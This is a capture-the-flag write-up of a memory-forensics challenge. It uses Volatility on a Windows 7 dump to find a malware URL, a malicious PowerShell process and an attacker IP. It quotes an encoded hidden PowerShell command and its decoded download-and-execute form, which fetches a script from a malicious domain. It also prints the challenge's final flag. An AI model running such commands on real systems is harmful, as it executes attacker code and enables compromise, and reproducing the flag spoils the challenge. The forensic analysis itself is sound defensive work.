ForensicsMiscellaneous +300 points

8 months ago - 137 views

Honeypot

This challenge gave a file called honeypot.raw. This was a big file (>1GB) and looking at the first few lines using the head command it looked like a VirtualBox VM. The challenge description has some specific questions on information to get from this image.

The Challenge

The challenge description asks us to find the following information in the file:

  1. Find the full URL used to download the malware.
  2. Find the malicious process ID.
  3. Find the attackers IP

In the end, the flag will be an md5 sum of these values in the following format (with the correct values replaced):
HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

Analysing

I wasn't experienced with this type of challenge, so I tried lots of ways to mount this image to my own VirtualBox software. Anything I tried just gave me an error, but eventually, I got another idea. This file is just a memory dump of the VM. A lot of information is stored in memory, so we can probably find the information we're looking for in there.

Using volatility we can analyze this memory dump to see what was happening on the VM at the time of the dump. There are two versions of volatility, the original version and volatility3 for Python 3. In this blog post, I'll be using them interchangeably so just look at the path in front of the command.

For the original volatility to work, we need to find the profile first. Using ./volatility/vol.py -f honeypot.raw imageinfo we get some information about the image, including a few suggestions for the profile. In this case, it suggests using Win7SP0x86, so we'll be using that for the rest of the analysis.

1. URL used to download malware

If we look at the process list, we can see two instances of iexplore.exe.

Bash

$ /volatility3/vol.py -f honeypot.raw windows.pslist

PID     PPID    ImageFileName   Offset(V)    CreateTime
...
3112    572     WmiPrvSE.exe    0x84b88788   2021-11-25 19:13:24
3324    2856    iexplore.exe    0x84bafc60   2021-11-25 19:13:31
3344    3324    iexplore.exe    0x856aa9b8   2021-11-25 19:13:31
2700    3720    powershell.exe  0x8420dd28   2021-11-25 19:13:50
3732    2616    conhost.exe     0x851733c8   2021-11-25 19:13:50
...

This means the user was likely visiting some pages on Internet Explorer. Luckily, volatility has a plugin that can find the Internet Explorer history, meaning we can see what websites were visited. Running this scan we get a lot of results.

Bash

$ /volatility/vol.py -f honeypot.raw --profile Win7SP0x86 iehistory

...
**************************************************
Process: 3344 iexplore.exe
Cache type "URL " at 0x709d300
Record length: 0x380
Location: https://windowsliveupdater.com/christmas_update.hta
Last modified: 2021-11-25 18:50:07 UTC+0000
Last accessed: 2021-11-25 19:13:50 UTC+0000
File Offset: 0x380, Data Offset: 0x9c, Data Length: 0xb4
File: christmas_update[1].hta
Data: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 464
etag: "619fdadf-1d0"
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mY%2BWRDwCloKF%2F%2Bq4Cg80hIVa3cyg%2BLElBu8GpVTYoANDvuEz3kCjllbf5NQAv3a1qODNV83KXbXapLkxIBkDrdQrFnPxDI%2BbpgvUF5ScHJOhnSCUoCQtwQMWQFcMeiu%2B2CI6JtCld2rw"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 6b3d32327b806f77-ATH
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

~U:santa
...

A few of these entries contain the following location: https://windowsliveupdater.com/christmas_update.hta (click at your own risk). This is a very suspicious link because a .hta file can contain VBScript and if run, can execute code in the target machine.

This URL is likely used to download the URL and will be part 1 of the puzzle

2. Malicious process ID

In the windows.pslist scan above, we also saw a powershell.exe process. This is suspicious because often payloads are triggered with Powershell or cmd. To check if this is not a false positive, we can check to see exactly what command it was running. Using the windows.cmdline scan. This will snow the commands of all running programs with one.

Bash

$ ./volatility3/vol.py -f honeypot.raw windows.cmdline

PID     Process         Args
...
3344    iexplore.exe    "C:\Program Files\Internet Explorer\iexplore.exe"
2700    powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732    conhost.exe     \??\C:\Windows\system32\conhost.exe
...

This Powershell command looks base64 encoded seen by the /e flag (encoded). Decoding this results in the following command:
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))
This uses a common command called iex or Invoke EXpression. It downloads a suspicious file from the same windowsliveupdater.com site and executes that file as Powershell code. Now we're sure this Powershell process is malicious, so we can get the PID (Process ID) of the powershell.exe process, which is 2700 as seen from the previous scan.

3. Attackers IP

Because we need to find the attacker's IP address, a good place to look is at the network connections. Maybe the attacker is still connected with the machine. We can use the netscan to see similar output to the windows netstat -a command.

Bash

$ ./volatility/vol.py -f honeypot.raw --profile Win7SP0x86 netscan

Proto   Local Address     Foreign Address       State
...
TCPv4   0.0.0.0:49156     0.0.0.0:0             LISTENING
TCPv4   10.0.2.15:49229   147.182.172.189:4444  ESTABLISHED
TCPv4   10.0.2.15:49216   212.205.126.106:443   ESTABLISHED
...

There are a few different foreign addresses in this result, but one stands out. The 147.182.172.189:4444 address uses port 4444, which is the default port for tools like Metasploit to get a reverse shell. All other ports are either 80 or 443, which is for HTTP and HTTPS traffic, probably done by Internet Explorer. So the attacker's IP address that is connected to the computer on port 4444 is 147.182.172.189.

Solution

Now that we have found all 3 parts of the flag, we can combine them as the format specified.
First, we need to concatenate the URL, Process ID, and IP address with an underscore separating them:
https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189
Then just take the md5 sum of this string, which results in 969b934d7396d043a50a37b70e1e010a. The flag will be this hash surrounded by the normal HTB{}. After submitting we see that this was the right flag!
HTB{969b934d7396d043a50a37b70e1e010a}